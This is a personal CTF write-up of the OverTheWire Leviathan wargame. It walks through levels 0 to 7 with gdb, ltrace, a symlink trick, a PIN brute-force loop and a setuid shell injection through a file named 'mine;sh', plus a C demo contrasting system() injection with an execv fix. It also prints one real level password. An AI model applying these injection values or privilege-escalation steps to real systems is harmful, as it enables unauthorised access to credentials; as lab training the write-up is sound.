[Leviathan]

/!\ NOTE: This writeup is kind of messed up. Take it as a kind of mind log of mine, so things might be unclear.


[lvl0]

login: - ssh leviathan0@leviathan.labs.overthewire.org

grep password .backup/bookmarks.html
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is rioGegei8m" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to leviathan1</A>


[lvl01]

To solve this level you have to start gdb and step through the assembly code until you reach the lines (4-5) before the call to strcmp. The second parameter pushed to strcmp is the string which solves this level:

=> 0x80485a7 <main+122>:        lea    eax,[esp+0x14]
   0x80485ab <main+126>:        mov    DWORD PTR [esp],eax
   0x80485ae <main+129>:        call   0x80483b0 <strcmp@plt>
   0x80485b3 <main+134>:        test   eax,eax
   0x80485b5 <main+136>:        jne    0x80485c5 <main+152>
   0x80485b7 <main+138>:        mov    DWORD PTR [esp],0x804868b
   0x80485be <main+145>:        call   0x8048400 <system@plt>
   0x80485c3 <main+150>:        jmp    0x80485d1 <main+164>
--------------------------------------------------------------------------------
0x080485a7 in main ()

gdb$ x /wx $eax
0xbfcb2ee8:     0x00786573
gdb$ x /s $eax
0xbfcb2ee8:      "s..."

as you can see, 's..' is the password we were looking for.

But at this point we still need the password to elevate to level2. So here we go:

   1 find / -user leviathan2 -group leviathan2 2>/dev/null
   2 /etc/leviathan_pass/leviathan2
   3 /var/crash/test; whoami
   4 /var/crash/date; date
   5 /var/crash/test; cd ..; cd ..; cd etc; cd leviathan_pass; cat leviathan3
   6 /var/crash/test
   7 /var/crash/test; cat \\etc
   8 /var/crash/test; cat

and the first entry from the find results is the file which contains the password:

$ cat /etc/leviathan_pass/leviathan2
ou......


[lvl02]

This is kind of simple

leviathan2@melinda:/tmp/myfilesfile$ ls
mine;sh  testfoo  testfoo0
leviathan2@melinda:/tmp/myfilesfile$ /home/leviathan2/printfile 'mine;sh'
/bin/cat: mine: No such file or directory
$ id
uid=12002(leviathan2) gid=12002(leviathan2) euid=12003(leviathan3) groups=12003(leviathan3),12002(leviathan2)
$ cat /etc/leviathan_pass/leviathan3
Ah.....
$

# The thing is, you have to create a file which has this odd name: 'mine;sh'
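
Why the odd name works, as an added example that is not part of the original writeup and not the source of printfile: it assumes printfile pastes its argument into a shell command line for /bin/cat (consistent with the "/bin/cat: mine: No such file or directory" output above) and contrasts that with an exec-based form where the name stays a single argument. The function names, the temp directory and the file name "note;exit 7" are constructed for the demo.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed vulnerable pattern: the name is pasted into a shell command line,
 * so /bin/sh treats the ';' inside it as a command separator. */
int print_via_shell(const char *name) {
    char cmd[512];
    if (snprintf(cmd, sizeof cmd, "/bin/cat %s", name) >= (int)sizeof cmd)
        return -1;
    int st = system(cmd);
    return (st != -1 && WIFEXITED(st)) ? WEXITSTATUS(st) : -1;
}

/* Hardened form: no shell is involved; the whole name is one argv entry. */
int print_via_exec(const char *name) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "cat", "--", (char *)name, NULL };
        execv("/bin/cat", argv);
        _exit(127);                       /* only reached if execv failed */
    }
    int st;
    if (waitpid(pid, &st, 0) < 0) return -1;
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

/* Constructed demo: returns the exit status seen for a file named "note;exit 7". */
int demo(int use_shell) {
    char dir[] = "/tmp/printfile-demo-XXXXXX";
    const char *name = "note;exit 7";     /* constructed sample name */
    if (!mkdtemp(dir) || chdir(dir) != 0) return -1;
    FILE *f = fopen(name, "w");
    if (!f || fputs("constructed content\n", f) < 0 || fclose(f) != 0) return -1;
    int rc = use_shell ? print_via_shell(name) : print_via_exec(name);
    remove(name);
    if (chdir("/") != 0 || rmdir(dir) != 0) return -1;
    return rc;
}

int main(void) {
    printf("shell form exit status: %d\n", demo(1));  /* text after ';' ran as a command */
    printf("exec form exit status:  %d\n", demo(0));  /* cat read the oddly named file */
    return 0;
}
```

In the shell form the status comes from the text after the ';', not from cat; in the exec form cat opens the file with the full name and nothing else runs.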


[lvl03]

leviathan3@melinda:~$ ltrace ./level3
__libc_start_main(0x80485fe, 1, 0xffffd7b4, 0x80486d0 <unfinished ...>
strcmp("h0no33", "kakaka")                                                                             = -1
printf("Enter the password> ")                                                                         = 20
fgets(Enter the password> snlprintf
"snlprintf\n", 256, 0xf7fcac20)                                                                  = 0xffffd5ac
strcmp("snlprintf\n", "snlprintf\n")                                                                   = 0
puts("[You've got shell]!"[You've got shell]!
)                                                                            = 20
system("/bin/sh"$
$ cat /etc/leviathan_pass/leviathan4
vu........
$


[lvl04]

on remote host:

cd .trash 
ls 
bin
./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010

here we have to decode a binary string in .trash. This is a pythonic approach:

dirk@lazerbeam0: ~  $ python                                                                 [16:55:01]
Python 2.7.8 (default, Jul 30 2014, 12:11:15) 
[GCC 4.2.1 20070719 ] on openbsd5
Type "help", "copyright", "credits" or "license" for more information.
>>> n = int('0101010001101001011101000110100000110100011000110110111101101011011001010110100100001010', 2)
>>> import binascii
>>> binascii.unhexlify('%x' %n)
'Ti.......\n'
>>> 

this is our password to enter leviathan lvl05 (without the \n).


[lvl05]

-_-

leviathan5@melinda:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
leviathan5@melinda:~$ ./leviathan5 
Ug......
leviathan5@melinda:~$ 


[lvl06]

for i in {0001..9999} ; do ./leviathan6 $i ; done
wait...
id
uid=12006(leviathan6) gid=12006(leviathan6) euid=12007(leviathan7) groups=12007(leviathan7),12006(leviathan6)
$ cat /etc/leviathan_pass/leviathan7
ah.....


[lvl07]

leviathan7@melinda:~$ ls
CONGRATULATIONS
leviathan7@melinda:~$ cat CONGRATULATIONS 
....
leviathan7@melinda:~$ 


exploitation

leviathan (last modified on 2016-12-12 17:32:52 by Dirk)